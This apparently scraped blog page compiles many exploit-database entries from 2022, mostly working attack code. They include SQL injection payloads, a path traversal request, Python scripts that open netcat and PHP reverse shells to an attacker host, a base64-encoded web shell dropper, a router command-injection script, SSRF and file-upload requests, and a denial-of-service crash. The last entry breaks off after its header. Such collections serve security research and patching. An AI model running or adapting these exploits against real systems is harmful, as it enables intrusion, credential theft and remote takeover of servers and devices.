# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
# Date: 14-08-2022
# Exploit Author: Rizacan Tufan
# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated
# Software Link: https://wordpress.org/plugins/zephyr-project-manager/
# Vendor Homepage: https://zephyr-one.com/
# Version: 3.2.42
# Tested on: Windows, Linux
# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)
# Description
Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.
It has been determined that the data coming from the input field in most places throughout the application are used in=20
the query without any sanitize and validation.
The details of the discovery are given below.
# Proof of Concept (PoC)=20
The details of the various SQL Injection on the application are given below.
## Endpoint of Get Project Data.
Sample Request :=20
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects
Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7
Payload :=20
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7
Type: time-based blind
Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)
Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7
---
## Endpoint of Get Task Data.
Sample Request :=20
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks
Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7
Payload :=20
---
Parameter: task_id (POST)
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7
---
## Endpoint of New Task.
Sample Request :=20
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks
Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 337
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7
Payload :=20
---
Parameter: task_project (POST)
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7
---
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863111928
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
Proof of Concept:
GET
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
Google Dork: n/a
Date:9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429
#!/usr/bin/python3
"""
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.
"""
import requests
import sys
import urllib.parse
import readline
import random
import string
# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434
# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80
USERNAME = None
PASSWORD = None
"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
# lets just ask
hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
session = requests.session()
data = session.get(hack_url)
for each in data.text.split('\n'):
key = None
val = None
try:
key = each.strip().split('=')[0]
val = each.strip().split('=')[1]
except:
pass
if key == "Account1":
USERNAME = val
if key == "Password1":
PASSWORD = val
"""
Second vulnerability, authenticated command execution
This only works on the local lan.
for full reverse shell, modify and upload netcat busybox shell script to /tmp:
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""
session = requests.session()
# initial login, establishes our Cookie
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)
# get our csrftoken
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]
while True:
CMD = input('x:')
CMD_u = urllib.parse.quote_plus(CMD)
filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))
try:
hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"
session.get(hack_url, timeout=0.01)
except requests.exceptions.ReadTimeout:
pass
# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: <1.7.4
# Tested on: Linux
# CVE : CVE-2022-24637
import argparse
import requests
import base64
import re
import random
import string
import hashlib
from termcolor import colored
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
def get_normalized_url(url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def get_proxy_protocol(url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
def get_random_string(length):
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for i in range(length))
def get_cache_content(cache_raw):
regex_cache_base64 = r'\*(\w*)\*'
regex_result = re.search(regex_cache_base64, cache_raw)
if not regex_result:
print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
exit()
else:
cache_base64 = regex_result.group(1)
return base64.b64decode(cache_base64).decode("ascii")
def get_cache_username(cache):
regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
return re.search(regex_cache_username, cache).group(1)
def get_cache_temppass(cache):
regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
return re.search(regex_cache_temppass, cache).group(1)
def get_update_nonce(url):
try:
update_nonce_request = session.get(url, proxies=proxies)
regex_update_nonce = r'owa_nonce" value="(\w*)"'
update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
except Exception as e:
print_message('An error occurred when attempting to update config!', "ERROR")
print(e)
exit()
else:
return update_nonce
parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
parser.add_argument('TARGET', type=str,
help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
parser.add_argument('ATTACKER_IP', type=str,
help='Address for reverse shell listener on attacking machine')
parser.add_argument('ATTACKER_PORT', type=str,
help='Port for reverse shell listener on attacking machine')
parser.add_argument('-u', '--username', default="admin", type=str,
help='The username to exploit (Default: admin)')
parser.add_argument('-p','--password', default=get_random_string(32), type=str,
help='The new password for the exploited user')
parser.add_argument('-P','--proxy', type=str,
help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-c', '--check', action='store_true',
help='Check vulnerability without exploitation')
args = parser.parse_args()
base_url = get_normalized_url(args.TARGET)
login_url = base_url + "index.php?owa_do=base.loginForm"
password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"
username = args.username
new_password = args.password
reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
session = requests.Session()
try:
mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
print_message('Could not connect to "' + base_url, "ERROR")
exit()
else:
print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")
if 'Open Web Analytics' not in mainpage_request.text:
print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
elif 'version=1.7.3' not in mainpage_request.text:
print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
else:
print_message('The webserver indicates a vulnerable version!', "ALERT")
try:
data = {
"owa_user_id": username,
"owa_password": username,
"owa_action": "base.login"
}
session.post(login_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred during the login attempt!', "ERROR")
print(e)
exit()
else:
print_message('Attempting to generate cache for "' + username + '" user', "INFO")
print_message('Attempting to find cache of "' + username + '" user', "INFO")
found = False
for key in range(100):
user_id = 'user_id' + str(key)
userid_hash = hashlib.md5(user_id.encode()).hexdigest()
filename = userid_hash + '.php'
cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
cache_request = requests.get(cache_url, proxies=proxies)
if cache_request.status_code != 200:
continue;
cache_raw = cache_request.text
cache = get_cache_content(cache_raw)
cache_username = get_cache_username(cache)
if cache_username != username:
print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
continue;
else:
found = True
break
if not found:
print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
exit()
cache_temppass = get_cache_temppass(cache)
print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")
if args.check:
print_message('The system appears to be vulnerable!', "ALERT")
exit()
try:
data = {
"owa_password": new_password,
"owa_password2": new_password,
"owa_k": cache_temppass,
"owa_action":
"base.usersChangePassword"
}
session.post(password_reset_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred when changing the user password!', "ERROR")
print(e)
exit()
else:
print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")
try:
data = {
"owa_user_id": username,
"owa_password": new_password,
"owa_action": "base.login"
}
session.post(login_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred during the login attempt!', "ERROR")
print(e)
exit()
else:
print_message('Logged in as "' + username + '" user', "SUCCESS")
nonce = get_update_nonce(update_config_url)
try:
log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
data = {
"owa_nonce": nonce,
"owa_action": "base.optionsUpdate",
"owa_config[base.error_log_file]": log_location,
"owa_config[base.error_log_level]": 2
}
session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred when attempting to update config!', "ERROR")
print(e)
exit()
else:
print_message('Creating log file', "INFO")
nonce = get_update_nonce(update_config_url)
try:
data = {
"owa_nonce": nonce,
"owa_action": "base.optionsUpdate",
"owa_config[shell]": reverse_shell
}
session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred when attempting to update config!', "ERROR")
print(e)
exit()
else:
print_message('Wrote payload to log file', "INFO")
try:
session.get(shell_url, proxies=proxies)
except Exception as e:
print(e)
else:
print_message('Triggering payload! Check your listener!', "SUCCESS")
print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")
# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"
# Date: Thursday, September 1, 2022
# Exploit Author: ABDO10
# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/
# Software Link: https://github.com/orangelabweb/imagemagick-engine/
# Version: <= 1.7.4
# Tested on: windows 10
-- vulnerable section
https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529
-- payload on windows: d&calc.exe&anything
-- on unix : notify-send "done"
-- exploit :
GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]
HTTP/1.1
Host: localhost
Cookie: wordpress_sec_xx=; wp-settings-time-1=;
wordpress_test_cookie=; wordpress_logged_in_xx=somestuff
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)
Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
# Exploit Title: IOTransfer V4 - Unquoted Service Path
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Discovery Date: 2022-28-07
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: https://iotransfer.itopvpn.com/download/
# Tested Version: V4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
Auto
C:\>sc qc IOTUpdaterSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IOTUpdaterSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IOTransfer Updater
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
url = args.url
shell_filename = "system_advanced_control.php"
def check_endpoint(url):
response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
if response.status_code == 200:
print("[+] pfBlockerNG is installed")
else:
print("\n[-] pfBlockerNG not installed")
sys.exit()
def upload_shell(url, shell_filename):
payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
print("[/] Uploading shell...")
response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
time.sleep(2)
response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
print("[+] Upload succeeded")
else:
print("\n[-] Error uploading shell. Probably patched ", response.content)
sys.exit()
def interactive_shell(url, shell_filename, cmd):
response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
print(str(response.text)+"\n")
def delete_shell(url, shell_filename):
delcmd = "rm /usr/local/www/system_advanced_control.php"
response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
print("\n[+] Shell deleted")
check_endpoint(url)
upload_shell(url, shell_filename)
try:
while True:
cmd = input("# ")
interactive_shell(url, shell_filename, cmd)
except:
delete_shell(url, shell_filename)
# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661
import requests
from subprocess import Popen, PIPE
router_host =3D "http://192.168.1.1"
authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"
lhost =3D "lo"
lport =3D 80
payload_port =3D 81
def main():
e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=
p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)
Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)
send_payload(f"|nc {lhost} {payload_port}|sh")
print("done.. check shell")
def get_session():
url =3D router_host + "/admin/ping.html"
headers =3D {"Authorization": "Basic {}".format(authorization_header)}
r =3D requests.get(url, headers=3Dheaders).text
i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
s =3D ""
while r[i] !=3D "'":
s =3D s + r[i]
i =3D i + 1
return s
def send_payload(payload):
print(payload)
url =3D router_host + "/admin/pingHost.cmd"
headers =3D {"Authorization": "Basic {}".format(authorization_header)}
params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=
: get_session()}
requests.get(url, headers=3Dheaders, params=3Dparams).text
main()
#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)
#Exploit Author: Emir Polat
#Vendor Homepage: https://github.com/opencv/cvat
#Version: < 2.0.0
#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
#CVE: CVE-2022-31188
# Description:
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"
http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"
170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"
true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"
true
-----------------------------251652214142138553464236533436--
# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
# Date: [18/09/2022]
# Exploit Author: [Edd13Mora]
# Vendor Homepage: [www.viaviweb.com]
# Version: [N/A]
# Tested on: [Windows 11 - Kali Linux]
------------------
SQLI on the Login page
------------------
payload --> admin' or 1=1-- -
---
POC:
---
[1] Disable JavaScript on ur browser put the payload and submit
[2] Reactive JavaScript and resend the request
---------------------------
Authenticated SQL Injection:
---------------------------
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
-----------------------------------------------
Remote Code Execution (RCE none authenticated):
-----------------------------------------------
Poc:
----
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
--------------------
Burp Request :
--------------------
POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"
1
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png
<?php phpinfo(); ?>
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"
-----------------------------33893919268150571572221367848--
Uploaded File can be found here :
--------------------------------
http://localhost/PAth-Where-Script-Installed/categories/
```
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841
# Tested on: Windows
# Proof Of Concept:
1 - login into AX3200 webui
2 - go to diagnostics page
3 - put "google.com|ls" to perform a traceroute
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
# Exploit Title: SoX 14.4.2 - Denial Of Service
# Exploit Author: LiquidWorm
Vendor: Chris Bagwell
Product web page: http://sox.sourceforge.net
https://en.wikipedia.org/wiki/SoX
Affected version: <=14.4.2
Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing
tools: it can convert sound files between many different file formats and
audio devices, and can apply many sound effects and transformations, as well
as doing basic analysis and providing input to more capable analysis and
plotting tools.
Desc: SoX suffers from a division by zero attack when handling WAV files,
resulting in denial of service vulnerability and possibly loss of data.
Tested on: Ubuntu 18.04.6 LTS
Microsoft Windows 10 Home
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5712
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php
CWE ID: 369
CWE URL: https://cwe.mitre.org/data/definitions/369.html
05.09.2022
--
PoC:
https://zeroscience.mk/codes/sox_div0.wav.zip
---
$ ./sox div0.wav test.wav reverse
Floating point exception (core dumped)
...
Program received signal SIGFPE, Arithmetic exception.
0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
(gdb) bt
#0 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
#1 0x000055555558dcc2 in open_read (path=<optimized out>, buffer=<optimized out>, buffer_size=<optimized out>, signal=0x5555559a5140, encoding=<optimized out>, filetype=0x555555777621 "wav")
at formats.c:545
#2 0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945
...
Program received signal SIGFPE, Arithmetic exception.
0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
1457 blocksWritten = MS_UNSPEC/wBlockAlign;
(gdb) bt
#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
#1 startwrite (ft=0x5555559a6a90) at wav.c:1252
#2 0x0000555555591669 in open_write (path=<optimized out>, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0,
signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:912
#3 0x0000555555593913 in sox_open_write (path=<optimized out>, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>)
at formats.c:948
#4 0x000055555556b620 in open_output_file () at sox.c:1557
#5 process () at sox.c:1754
#6 main (argc=<optimized out>, argv=<optimized out>) at sox.c:3008
(gdb) bt full
#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
wFormatTag = 1
dwAvgBytesPerSec = 0
dwFactSize = 4
bytespersample = <optimized out>
blocksWritten = <error reading variable blocksWritten (Division by zero)>
dwSamplesWritten = 0
...
# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection
# Date: Sep 22, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
